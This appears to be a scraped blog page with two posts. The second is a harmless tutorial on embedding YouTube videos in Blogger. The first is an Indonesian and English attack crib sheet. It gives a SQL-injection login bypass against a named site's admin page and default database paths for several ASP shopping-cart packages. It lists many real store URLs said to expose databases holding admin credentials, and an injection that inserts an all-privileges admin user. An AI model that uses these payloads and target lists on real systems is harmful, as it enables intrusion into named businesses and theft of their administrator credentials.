http://www.516700.com/htgirl/manage/login.asp L:admin P:' or '1' = '1




/fpdb/shop.mdb
/shoponline/fpdb/shop.mdb
/database/metacart.mdb
/shopping/database/metacart.mdb
/shop/database/metacart.mdb
/metacart/database/metacart.mdb
/mcartfree/database/metacart.mdb
/ASP/cart/database/metacart.mdb




http://www.premierhawaii.com/Shopping/ivan.mdb
http://www.exclamationscubancigars.com/cgi-bin/shopping350.mdb
http://www.norteamengros.no/shop/shopping400.mdb
http://www.aamx.com/shopping450.mdb
http://www.onlinedancing.com/shop/shopping.mdb
http://www.missouririvertraders.com/shopping/missouri.mdb
http://www.jinhuaham.com/newshop/shopping.mdb
http://www.copperfast.com/metacart/metacart.mdb
http://www.ocie.com/metacart/metacart.mdb
http://www.scrappingcorner.com/productcart/pcadmin/eipc.mdb
http://glasspec.com/productcart/pcadmin/eipc.mdb
http://www.nexostherapeuticals.com/productcart/pcadmin/eipc.mdb
http://www.azardisplays.com/productcart/pcadmin/eipc.mdb

-----------------------------------------------------------------

************Sample**************


https://secure.wetplanet.com/comersus/backofficelite/comersus_backoffice_index.asp
https://secure.wetplanet.com/comersus/backofficelite/comersus_backoffice_rc4Exec.asp
https://secure.wetplanet.com/comersus/backofficelite/comersus_backoffice_menuUtilities.asp



http://www.digitalive.hpg.com.br/database/comersus.mdb
http://members.xoom.virgilio.it/superand/comersus/database/comersus.mdb
http://www.digiser.ritex.com/tienda2/database/COMERSUS.mdb
http://home.bhak-voitsberg.ac.at/students/1538reicher/comersus/database/comersus.mdb
http://www.musiceducationcenter.com/comersus/store/comersus.mdb

----------------------------------------------------------------------------

cari file data basenya yang extensinya .mdb file ini bisa di buka dengan microsoft acces terbaru, dan berisi login dan pass admin nya.
RUMUSNYA:
http://[vp-asp site]/[vp-asp dir]/[xDatabase + .mdb]
http://[vp-asp site]/[vp-asp dir]/shopdbtest.asp --> untuk mengetahui nama file data basenya. bisa juga mengetahui lokasi filenya.
http://[vp-asp site]/[vp-asp dir]/shopa_sessionlist.asp --> ini untuk mengetahui posisi/ letak file mdb nya.


misal : www.toko.com/shop/toko.mdb
www.target.com/cgi-local/shopper.cgi?preadd=action&key=...
www.target.com/cgi-bin/shopper.cgi?preadd=action&key=...
www.target.com/cgibin/shopper.cgi?preadd=action&key=..
www.target.com/cgi-local/shopper.cgi?preadd=action&key=...


RUMUSNYA:
http://[vp-asp site]/[vp-asp dir]/[xDatabase + .mdb]
http://[vp-asp site]/[vp-asp dir]/shopdbtest.asp --> untuk mengetahui nama file data basenya. bisa juga mengetahui lokasi filenya.
http://[vp-asp site]/[vp-asp dir]/shopa_sessionlist.asp --> ini untuk mengetahui posisi/ letak file mdb nya.



***********Injection (jar)***************


insert into tbluser ("fldusername","fldpassword","fldaccess") values ('ascii','ascii','1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29')--


===========================================================================================================

Posted by -=:.BrownSugarFree.:=- at 6:27 PM | Permalink | Comments

 YouTube is probably the most famous video sites on the web with people watching more than 70 million videos on the site daily. No wonder once in a while you would like to add a video to your blogger blogs. But if you don’t want to spend too much time and effort in figuring out a way to get things done and looking for a step-by-step tutorial to do it then this is the post tailor made especially for you. So what are we waiting for? Lets get down to the business.

You can do it in two ways - geeky or non-geeky way! Geeky method would need you to play with html code a bit while second method do it for you. The benefit of geeky method is less time

First the non geeky way!

At the time of writing this article only registered YouTube members can use the GUI to upload these videos on their blogs and currently it only support Blogger.com and LiveJournal blogs. So you would need to login with your you-tube account to do this. Don’t worry, registration is free and takes only few minutes.

1.Once you have logged in, you can upload the video of your choice by clicking on the “Blog Video” link given in the box just below the video.

2.On clicking the link a small window will pop-up, click on the “Click here” link to add your blogspot blog for the first time. On clicking this link a new window will open.

3.Click on “Add a New Blog” link. As of now only Blogger and LiveJournal blogs are supported by YouTube.
4.In the new window enter your blogger account username and password. Click on the “Add Blog” button.

5.Once entering the correct user id and password all the blogs in your profile would be shown, check the box next to your blog of choice.
6.Now that your blog is added to the list just click “refresh in the pop-up box below the video.
7.Now choose the blog from drop down menu and enter title and text of your choice. But there is on thing to note that the “title” you enter in this box is not the title of your blog post, its going to remain empty. This “title” text is actually bold texts of your blog post and “text” is usual body.


That’s it, just click “Post to Blog” and check your blog for new post, you might have to refresh to see the changes.

Now the Geeky way!

Open up you blogger post editor and click on edit ”Edit Html” tab. Now all you have to do is copy the embed code from video page and paste it to your text editor. you can find your embed code in the top right corner of the video page.

Posted by -=:.BrownSugarFree.:=- at 5:48 PM | Permalink | Comments

 

Posted by -=:.BrownSugarFree.:=- at 4:38 PM | Permalink | Comments

 

Posted by -=:.BrownSugarFree.:=- at 3:49 PM | Permalink | Comments